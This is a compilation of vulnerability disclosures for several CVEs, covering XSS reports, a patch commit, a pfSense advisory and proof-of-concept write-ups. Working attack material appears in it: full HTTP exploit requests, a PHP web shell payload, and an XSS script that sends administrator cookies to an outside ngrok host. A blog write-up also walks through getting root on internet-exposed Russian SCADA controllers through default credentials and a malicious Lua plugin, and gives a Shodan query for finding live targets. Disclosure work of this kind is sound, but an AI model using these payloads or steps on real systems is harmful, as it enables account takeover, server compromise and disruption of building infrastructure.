A Cross Site Scripting vulnerabilty exists in Pixelimity 1.0 via the Site Description field in pixelimity/admin/setting.php

Vulnerabilty found in Pixelimity by "HAXSS" a Reinforcement Learning Agent for Cross Site Scripting (XSS) testing.

**Description:**

The "Site Description" field of the "pixelimity/admin/setting.php" page of Pixelimity CMS is subject to a Cross Site Scripting (XSS) vulnerability. This allows malicious users to send an authenticated POST HTTP request to inject JavaScript or HTML.

**Known Payloads:**

*   "></input><style onload=alert(2591776654)></style>

**Steps to Reproduce:**

1\. Log into the admin panel ('admin/signin.php').

2\. Use the dashboard to navigate to the config page ('admin/setting.php')

3\. Edit the "Site Description" field on the page to a malicious payload

![](http://rlsec.xyz/vulns/images/pixelimity_1.png)

![](http://rlsec.xyz/vulns/images/pixelimity_2.png)

4\. Save the settings

5\. Vulnerability is shown

![](http://rlsec.xyz/vulns/images/pixelimity_3.png)

CVE-2021-42866: CVE-2021-42866: Pixelimity 1.0 XSS vulnerability

Multiple Cross Site Scripting (XSS) vulnerabilities exist in Ssourcecodester Simple Client Management System v1 via (1) Add new Client and (2) Add new invoice.

\# Exploit Title: Simple Client Management System 1.0 - 'multiple' Stored Cross-Site Scripting (XSS) # Exploit Author: Sentinal920 # Date: 5-11-2021 (5th Nov 2021) # Category: Web application # Vendor Homepage: https://www.sourcecodester.com/php/15027/simple-client-management-system-php-source-code.html # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/cms.zip # Version: 1.0 # Tested on: Kali Linux # Vulnerable page: client,invoice # Vulnerable Parameters: "lastname", "remarks" Technical description: A stored XSS vulnerability exists in the Simple Client Management System. An attacker can leverage this vulnerability in order to run javascript on the web server surfers behalf, which can lead to cookie stealing, defacement and more. Steps to exploit: 1) Navigate to http://localhost/cms/admin/?page=client 2) Click on add new client 3) Insert your payload in the "lastname" parameter or the "description" parameter 4) Click save Proof of concept (Poc): The following payload will allow you to run the javascript - 1) XSS POC in Add New Client POST /cms/classes/Master.php?f=save\_client HTTP/1.1 Host: localhost Content-Length: 1026 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIBW1SfSFiXMKK7Nt X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=client/manage\_client Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="lastname" ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="firstname" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="middlename" anything ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="gender" Male ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="dob" 2021-11-03 ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="contact" xxxxxxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="address" xxxxxx ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="email" xxxx@xxx.com ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt Content-Disposition: form-data; name="avatar"; filename="" Content-Type: application/octet-stream ------WebKitFormBoundaryIBW1SfSFiXMKK7Nt-- 2) XSS POC in Add New Invoice POST /cms/classes/Master.php?f=save\_invoice HTTP/1.1 Host: localhost Content-Length: 1032 sec-ch-ua: "Chromium";v="93", " Not;A Brand";v="99" Accept: application/json, text/javascript, \*/\*; q=0.01 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEk0iOWhhoA0lApXo X-Requested-With: XMLHttpRequest sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.82 Safari/537.36 sec-ch-ua-platform: "Windows" Origin: http://localhost Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Referer: http://localhost/cms/admin/?page=invoice/manage\_invoice Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=g1copl50hh7e2c8m1kenc0vikn Connection: close ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="id" ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="client\_id" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="service\_id\[\]" 1 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="price\[\]" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount\_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="discount" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax\_perc" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="tax" 0 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="total\_amount" 250 ------WebKitFormBoundaryEk0iOWhhoA0lApXo Content-Disposition: form-data; name="remarks" ------WebKitFormBoundaryEk0iOWhhoA0lApXo--

CVE-2021-43505

Cross-site Scripting (XSS) - Stored in GitHub repository vanessa219/vditor prior to 3.8.13.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    
    *   Explore
    *   All features
    *   Documentation
    *   GitHub Skills
    *   Blog
    
*   *   For
    *   Enterprise
    *   Teams
    *   Startups
    *   Education
    
    *   By Solution
    *   CI/CD & Automation
    *   DevOps
    *   DevSecOps
    
    *   Case Studies
    *   Customer Stories
    *   Resources
    
*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
    *   Repositories
    *   Topics
    *   Trending
    *   Collections
    
*   Pricing

*   Notifications
*   Fork 643

*   Code
*   Issues 83
*   Pull requests 1
*   Security
*   Insights

Permalink

Showing **4 changed files** with **7 additions** and **6 deletions**.

*   CHANGELOG.md
*   *   comment.js
*   package.json
*   *   lute.min.js

  

@@ -99,6 +99,7 @@

  

### v3.8.13 / 2022-04

  

\* \[1206\](https://github.com/Vanessa219/vditor/issues/1206) 评论语法解析和行级 HTML 解析冲突 \`修复缺陷\`

\* \[1054\](https://github.com/Vanessa219/vditor/issues/1054) disabled 后应禁止粘贴 \`修复缺陷\`

\* \[1162\](https://github.com/Vanessa219/vditor/issues/1162) XSS 安全漏洞 \`修复缺陷\`

\* \[1203\](https://github.com/Vanessa219/vditor/issues/1203) 支持 solidity, yul 语法 \`引入特性\`

@@ -66,7 +66,7 @@ const renderComments = (ids) => {

cmtElement.innerHTML \= \`<div>

${text}<br>

<button>删除</button><br>

<input>

<input>

</div>\`

cmtElement.value \= text

document.getElementById('comments').

@@ -127,7 +127,7 @@ window.vditor = new Vditor('vditor', {

cmtElement.innerHTML \= \`<div>

${text}<br>

<button>删除</button><br>

<input>

<input>

</div>\`

cmtElement.value \= text

if (index \=== 0) {

@@ -1,6 +1,6 @@

{

"name": "vditor",

"version": "3.8.12",

"version": "3.8.13",

"description": "♏ 易于使用的 Markdown 编辑器，为适配不同的应用场景而生",

"author": "Vanessa <v@b3log.org> (http://vanessa.b3log.org)",

"homepage": "https://b3log.org/vditor",

Large diffs are not rendered by default.

**0 comments on commit e912e36**

Please sign in to comment.

CVE-2022-0350: :arrow_up: · Vanessa219/vditor@e912e36

Permalink

Browse files

⬆️

*   Loading branch information

![@Vanessa219](https://avatars.githubusercontent.com/u/970828?s=40&v=4)

1 parent 17d9af5 commit e912e36ea98251d700499b1ac7702708d3398476

Showing with **7 additions** and **6 deletions**.

1.  +1 −0 CHANGELOG.md
2.  +2 −2 demo/comment.js
3.  +1 −1 package.json
4.  +3 −3 src/js/lute/lute.min.js

  

@@ -99,6 +99,7 @@

  

### v3.8.13 / 2022-04

  

\* \[1206\](https://github.com/Vanessa219/vditor/issues/1206) 评论语法解析和行级 HTML 解析冲突 \`修复缺陷\`

\* \[1054\](https://github.com/Vanessa219/vditor/issues/1054) disabled 后应禁止粘贴 \`修复缺陷\`

\* \[1162\](https://github.com/Vanessa219/vditor/issues/1162) XSS 安全漏洞 \`修复缺陷\`

\* \[1203\](https://github.com/Vanessa219/vditor/issues/1203) 支持 solidity, yul 语法 \`引入特性\`

@@ -66,7 +66,7 @@ const renderComments = (ids) => {

cmtElement.innerHTML \= \`<div>

${text}<br>

<button>删除</button><br>

<input>

<input>

</div>\`

cmtElement.value \= text

document.getElementById('comments').

@@ -127,7 +127,7 @@ window.vditor = new Vditor('vditor', {

cmtElement.innerHTML \= \`<div>

${text}<br>

<button>删除</button><br>

<input>

<input>

</div>\`

cmtElement.value \= text

if (index \=== 0) {

@@ -1,6 +1,6 @@

{

"name": "vditor",

"version": "3.8.12",

"version": "3.8.13",

"description": "♏ 易于使用的 Markdown 编辑器，为适配不同的应用场景而生",

"author": "Vanessa <v@b3log.org> (http://vanessa.b3log.org)",

"homepage": "https://b3log.org/vditor",

Large diffs are not rendered by default.

**0 comments on commit `e912e36`**

Please sign in to comment.

Improper input validation vulnerability in pfSense CE and pfSense Plus (pfSense CE software versions prior to 2.6.0 and pfSense Plus software versions prior to 22.01) allows a remote attacker with the privilege to change OpenVPN client or server settings to execute an arbitrary command.

\-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 ============================================================================= pfSense-SA-22\_03.webgui Security Advisory pfSense Topic: Multiple vulnerabilities in the WebGUI Category: pfSense Base System Module: webgui Announced: 2022-01-13 Credits: Yutaka WATANABE of Ierae Security, Inc. via JPCERT/CC CVE ID: CVE-2022-24299 Affects: pfSense Plus software versions < 22.01 pfSense CE software versions < 2.6.0 Corrected: 2022-01-14 17:24:32 UTC (pfSense Plus master) 2022-01-17 17:45:31 UTC (pfSense Plus 22.01) 2022-01-14 17:24:32 UTC (pfSense CE master) 2022-01-17 17:45:31 UTC (pfSense CE 2.6.0) 0. Revision History v1.2 2022-03-08 Removed JVN ID, added CVE ID, updated solution information. v1.1 2022-02-14 Fix Redmine link v1.0 2022-01-13 Initial SA draft I. Background pfSense® software is a free network firewall distribution based on the FreeBSD operating system. The pfSense software distribution includes third- party free software packages for additional functionality, and provides most of the functionality of common commercial firewalls. pfSense® Plus is the productized version of pfSense software from Netgate®, previously referred to as pfSense Factory Edition (FE). It is available to Netgate appliance and CSP customers. The majority of users of pfSense software have never installed or used a stock FreeBSD system. Unlike similar GNU/Linux-based firewall distributions, there is no need for any UNIX knowledge. The command line is never used, and there is no need to ever manually edit any rule sets. Instead, pfSense software includes a web interface for the configuration of all included components. Users familiar with commercial firewalls will quickly understand the web interface, while those unfamiliar with commercial-grade firewalls may encounter a short learning curve. II. Problem Description The vpn\_openvpn\_server.php and vpn\_openvpn\_client.php pages in the pfSense Plus and pfSense CE software GUI did not properly validate user input passed via the data\_ciphers parameter in certain cases. This problems is present on pfSense Plus version 21.05.2, pfSense CE version 2.5.2, and earlier versions of both. When the client or server mode was set to p2p\_shared\_key, the GUI did not validate user input in the data\_ciphers parameter but the backend code still included the value of data\_ciphers in the OpenVPN configuration. By passing carefully crafted data including parameters which allow OpenVPN to execute scripts, an attacker could execute arbitrary shell commands and read or write arbitrary files. NOTE: The Custom Options field on OpenVPN client and server configuration pages also allows this type of action intentionally, but that field has a separate privilege which can limit access to prevent users from altering its contents. III. Impact An authenticated attacker with access the to affected page, even without access to the Custom Options field, could execute arbitrary shell commands, perform privilege escalation, information disclosure, denial of service, or other negative outcomes. IV. Workaround To help mitigate the problem on older releases, use one or more of the following: \* Limit access to the affected pages to trusted administrators only. V. Solution Users can upgrade to pfSense Plus software version 22.01 or later when available, or pfSense CE software version 2.6.0 or later. This upgrade may be performed in the web interface or from the console. See https://docs.netgate.com/pfsense/en/latest/install/upgrade-guide.html Users on pfSense Plus version 21.05.2 or pfSense pfSense CE version 2.5.2 may apply the fix from the recommended patches list in the System Patches package. Users may also manually apply the relevant revisions below using the System Patches package on pfSense pfSense Plus version 21.05.2 or pfSense CE version 2.5.2 and possibly on earlier versions. See https://docs.netgate.com/pfsense/en/latest/development/system-patches.html VI. Correction details The following list contains the correction revision commit ID for each affected item. Branch/path Revision ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ plus/plus-master 78ce96a9af3b2ab5159ef6623078bfc4b15f8a89 ba815f3d219e5bdf404be859e723db2ff0c9258c plus/plus-RELENG\_22\_01 68afc597b0545b57b605ae8200954b1b5a89bcad fae2f2d553f42479721db67fc4ff1ddb70caeffa pfSense/master 78ce96a9af3b2ab5159ef6623078bfc4b15f8a89 ba815f3d219e5bdf404be859e723db2ff0c9258c pfSense/RELENG\_2\_6\_0 68afc597b0545b57b605ae8200954b1b5a89bcad fae2f2d553f42479721db67fc4ff1ddb70caeffa ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ VII. References The latest revision of this advisory is available at \-----BEGIN PGP SIGNATURE----- iQIzBAEBCgAdFiEE40XvjEU56XSUPIMdE7mH/ZIU+NoFAmInWR0ACgkQE7mH/ZIU +NrSRQ//TZ79u1qK8Mrrc7XFc79EZPJGS7z4lK0OuhJ3V+ygFqkZEYPKjxxOBFWK 8SVn4NlzMTmiEoa136JhS4ONc519LNpLa/kaM0F0vuLcu/DywWpuzU6z5QpDL9jX kDmA9lCzY4pDU53Uuy3FTXO6BMgQTWaIS16fcUz+s0DdZi0hweZQypSBYZe48zmJ uzeJwY0TnDVYgJjriBn/nj6SMnN2DtSZmj+CpfHzQwTsl4P9RLXhoEBW9Vu0gaS7 cP1eKWWdJ1th5+Pt6KCFOuMiiWJ8O3j31xXSSsWiWLo7sUdd9It6CejaVP3w8cmn tMOw4m2pyeB+/H2Ao6hxqsFXGZv5gFPeUcVP82sJihtWMM4aZkP/rDSqUDC6cJwV fJ3hwfEhpfLFcxhlSDKAlLJSTQ9+Gnc7+0uC3mEcuDoApXuEo8yE0c6suqSKKsEb qvQiYERXPHrmDI+4y0msuEYUGbETS71ibZbpykiy1CQEKnnipO63WkOZ1XkCtv9P fwbiCN3xjz+XFKvT5EKJwhp0o0UjyYJxTjD8CLKQny0koy6mlo5R3J+5BjjktgYV RjlJJIxuRvscmmlrumUcuZdnsiK8Uvkw0YODzfjabm5SIf0E0OXIIfNv2jxjCdSX 5jZUNF70lGqSVrUz9JEeH+OfpMkGLf4CE/cBYIE7rGC257tDcLE= =n7jy -----END PGP SIGNATURE-----

CVE-2022-24299

totolink EX300_v2 V4.0.3c.140_B20210429 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /home.asp.

Permalink

Cannot retrieve contributors at this time

**Affected device**

product: EX300\_v2  
version: V4.0.3c.140\_B20210429

**Vulnerability description**

EX300\_v2 Repeater suffers from a reflected XSS vulnerability due to unsanitized SSID value when the latter is displayed in the /home.asp page.

This is the SSID setted.

![](https://github.com/chibataiki/iot-vuls/raw/main/totolink/src/wifi.png)

This is the wifi scanned result in ex300\_v2.

![](https://github.com/chibataiki/iot-vuls/raw/main/totolink/src/xss.png)

CVE-2021-43661: iot-vuls/xss-vulnerability.md at main · chibataiki/iot-vuls

A remote code execution (RCE) vulnerability in Online Banking System Protect v1.0 allows attackers to execute arbitrary code via a crafted PHP file uploaded through the Upload Image function.

main

Switch branches/tags

CVE/**CVE-2022-26645**/

Go to file

CVE/**CVE-2022-26645**/

**Latest commit**

![@erik-451](https://avatars.githubusercontent.com/u/47476901?s=48&v=4)

erik-451 Create README.md

9b75638

Mar 29, 2022

Create README.md

`9b75638`

**Git stats**

*   **History**

**Files**

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

. .

README.md

Create README.md

Mar 29, 2022

Tittle: Online Banking System RCE Author: (Erik451) Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html Version: OBS 1.0 CVE: CVE-2022-26645 Steps to reproduce:

**README.md**

**Tittle: Online Banking System RCE****Author: (Erik451)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html****Version: OBS 1.0**

*   Description: Potential RCE and XSS via file upload. A user can use the upload functionality to gain access to the server crafting php code.

**Steps to reproduce:**

*   **1- Go to http://web.com/admin/?page=user**
*   **2- Modify your avatar profile and upload your php code.**

Payload used: `<?php echo shell_exec($_GET['shell']);?>`

![phpcode](https://user-images.githubusercontent.com/47476901/160638195-898d61e9-4467-4e32-b95c-362c0aecff97.png)

*   **3- We can see the url of the uploaded file clicking on the image zone.**

![upload](https://user-images.githubusercontent.com/47476901/160638239-48088317-ba7f-497a-bfb4-91eb9570eda7.png)

*   **4- Going to that url we will execute the code.**

http://<ip\_server>/uploads/1648559940\_shell.php?shell=id ![rce](https://user-images.githubusercontent.com/47476901/160638221-ec57e5bf-4793-459e-8763-a913e496825b.png)

CVE-2022-26645: CVE/CVE-2022-26645 at main · erik-451/CVE

Online Banking System Protect v1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via parameters on user profile, system_info and accounts management.

**Tittle: Online Banking System Stored XSS****Author: (Erik451)****Vendor Homepage: https://www.sourcecodester.com/****Software Link: https://www.sourcecodester.com/php/14868/banking-system-using-php-free-source-code.html****Version: OBS 1.0**

*   **Description:** A XSS issue in OBS v1.0 allows remote attackers to inject JavaScript in the description parameters. XSS to Privilege Escalation
*   Client can craft a malicious payload, when the administrator goes to "account managment menu" the payload will be executed and the administrator cookies will be sent to the attacker server.

**Steps to reproduce:**

*   1- Go to http://localhost/banking/client/?page=user
*   2- Edite your profile name and paste the payload
*   3- Using a ngrok http server to get the request with the administrator cookie

Payload used to steal the session Cookie:

<script\>var i=new Image;i.src=\`https://2c32-81-9-194-204.ngrok.io/?c=${document.cookie}\`;</script\>

![ngrokclient](https://user-images.githubusercontent.com/47476901/160634443-a0b5afaa-a2f0-404f-9bb2-a3437e534c6d.png)

****Admin Session****

The administrator goes to the manage accounts menu and will execute the payload in background. Now we have the admin cookie on the request

![admincookie](https://user-images.githubusercontent.com/47476901/160656693-e8ce72d9-66f1-4635-85df-f1b8042a8e1f.png)

Edit our cookie with the new admin cookie, reload admin page and now we are administrators.

![loginasadmin](https://user-images.githubusercontent.com/47476901/160634399-08084a58-6c77-47b8-97c7-27c9fb274d8c.png)

**Other XSS**

Payload used: `<img src="x" onerror=prompt(1)>`

**Announcements Tittle**

*   1- Go to http://web.com/admin/?page=announcements/manage\_announcement
*   2- Create or edite an announcement and paste the payload

![XSSannouncement](https://user-images.githubusercontent.com/47476901/160634336-a3d0ff72-878b-4102-9eff-5759581f3695.png)

![XSSannouncement2](https://user-images.githubusercontent.com/47476901/160634352-303bc621-c09d-4993-86e0-316b183809ab.png)

**Accounts Name**

*   1- Go to http://web.com/admin/?page=accounts/manage\_account
*   2- Create or edite an accounts and paste the payload, client account will execute the payload on his session.

**System Info Name**

*   1- Go to http://web.com/admin/?page=system\_info
*   2- Edite the app/system info and paste the payload
*   3- This is the configuration of the app, all clients will see the tittle on the app, the XSS will be executed.

![XSSsysinfo](https://user-images.githubusercontent.com/47476901/160634484-659cfb45-6e0e-446a-be77-76296ee56383.png)

CVE-2022-26644: CVE/CVE-2022-26644 at main · erik-451/CVE

QingScan 1.3.0 is affected by Cross Site Scripting (XSS) vulnerability in all search functions.

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2022-24135: Search function Cross Site Script(XSS) Vulnerability · Issue #17 · 78778443/QingScan

Tekon KIO devices through 2022-03-30 allow an authenticated admin user to escalate privileges to root by uploading a malicious Lua plugin.

Hello World

The following is a writeup about a research i did today at morning march 17 2022 , took me 3 hours and no breakfast, after lunch and succesful pwned i’m writing this.

The affected devices are controllers from a russian brand called tekon.ru

![](https://miro.medium.com/max/1400/1*OdUhjvHMo2bWABwVGB9d6Q.png)

Tekon is responsable to manufacture SCADA devices for russian market specifically, controllers, hubs , modbus devices all focused for building equipment and SCADA enviroments.

I found more than 100+ devices connected to the internet all them located in Russia exclusively , those devices are running with default credentials almost all of them and anyone can connect to them and perform changes and actions as “admin” only .

https://www.shodan.io/search?query=country%3Aru+title%3A%22%D0%BA%D0%BE%D0%BD%D1%82%D1%80%D0%BE%D0%BB%D0%BB%D0%B5%D1%80%22&page=2

![](https://miro.medium.com/max/1400/1*bWQeT7Eo8yqI7qgUfcm_Ug.png)

![](https://miro.medium.com/max/1400/1*PhKxzgsaNx6vDgO7dPHKwg.png)

when you get the default index you will see something like this:

![](https://miro.medium.com/max/1400/1*1RMCCazmJAl6F6-Iaayemg.png)

Everything is in russian but don’t worry gogle translate tab is your friend

![](https://miro.medium.com/max/1400/1*gxa5430A9e81JfxAuGXI2A.png)

After some research i found that tekon.ru did a great job put it in manuals firmwares and software related to easy access for anyone interested to take a look , in our case we need the manuals in order to dig for some default credentials , you know… in our case we need to acces somehow someway ..

![](https://miro.medium.com/max/1400/1*A6v-yhexsShdyJA0T4IKPA.png)

After translation and reading i found the default credentials which are **_admin:secret_** , trying the first result i was completely in, profit for me!!

![](https://miro.medium.com/max/1400/1*WT5eVepSEmBS9GqvxWQwRg.png)

Well now i’m in with defaults what can i do here ? and more importantly what kind of priviledges i have at this moment , you can enable the SSH access from the panel or even change the default password , so the engineers are not going to be able to acces again if you do that …

![](https://miro.medium.com/max/1400/1*2JWBk00QdQLiv1FKO4QBCg.png)

So, with the SSH access my idea was to confirm what type of priviledges the user admin is running right now, for my surprise the admin user is not root, which is boomer at that point of the research .

![](https://miro.medium.com/max/696/1*MzyedwOD2sUFZk8QDIo58A.png)

Well, this means we can not do any interesting action with the admin user like command execution, we need to escalate privilegdes someway somehow .

After reading all manuals and learn about the device features i noticed there are some documented cgi scripts and some of them are not documented

![](https://miro.medium.com/max/1400/1*Q9EngS6PY5nBTuLfzvF3RQ.png)

in the path /srv/www/cgi-bin you can find those scripts , some of them are interesting like the serkill.cgi, you can call it and a process is going to be stoped

![](https://miro.medium.com/max/1348/1*L_TVUDp351d5X5bkDNg2Rg.png)

Well i was thinking….. if i could upload my custom cgi script i could execute bash, but the user admin doesn’t have the permisions, permission is denied.

![](https://miro.medium.com/max/1350/1*4gHJCrRNsxjRTneXH0G2Dw.png)

Mmm.. seriously i need to figure out how to upload my stuff here and execute commands, i knew i was closer.

After reading again the manuls for second time and playing around with the web app i found an interesting module for LUA script plugin upload and execution, just look for the plugin section .

![](https://miro.medium.com/max/1400/1*Llc08ujTYxeOOsqkm8ZKbw.png)

According the manuals you can upload your custom LUA scripts “plugins” and they are going to be executed after you click the save/load button

**_Priviledge Escalation_**

I though the following, LUA plugin should be running as root yes or yes , if i could upload a malicious LUA plugin with custom commands those are going to be executed as root and then i could place a custom cgi in /srv/www/cgi-bin path easily bypassing the admin user priviledges.

Ok here we go, open up your notepad++ and write some LUA code , in order to execute OS commands you just need os.excute

![](https://miro.medium.com/max/1376/1*JkwM2nu-RENH9wbsAKH3Wg.png)

Save the LUA malicious plugin/code and create a .TAR file with 7 zip in windows

Upload the malicios LUA plugin

![](https://miro.medium.com/max/1400/1*gyBdK6myboo8Y90D8WUy1A.png)

Then press save/load

![](https://miro.medium.com/max/1296/1*pW4uMayXxp6Tq1AWljp_WA.png)

At this point you’re blind and you don’t know if your code is being executed, but do you remember the cgi files i show you before ? well there is one for debug purposes and is called **_log.cgi_**

![](https://miro.medium.com/max/472/1*STNIFWGQXL24_20Oot0cIw.png)

invoke log.cgi

After upload the malicious LUA plugin just invoke log.cgi script , go to the bottom and you will see the output for the obscure LUA plugin

BOOM !! WE GOT RCE AND PRIVILEDGE ESCALATION 😎

NOW WE ARE ROOT !!!

![](https://miro.medium.com/max/1400/1*zI7jzmMuSzAfssiADjkfTg.png)

1337

Let’s try with cat /etc/passwd

![](https://miro.medium.com/max/946/1*wu4VI951DWmcljUCeh9FMQ.png)

Yeah !! there you go 😎 gimme the shit

![](https://miro.medium.com/max/1400/1*D1g9qNuW1kh4soNeEbkd4A.png)

cat /etc/passwd

Well i got RCE and privilege escalation from an admin user to root , now we can do whatever, more critically those devices can be shut down at once the 100 creating an impact in russian scada systems , remotely.

From this point now we can create custom cgi files and call them from cgi/bin path and do whatever .

You can follow on twitter for more “on the fly” research and pwn delivery @bertinjoseb

Thanks

Tag

#xss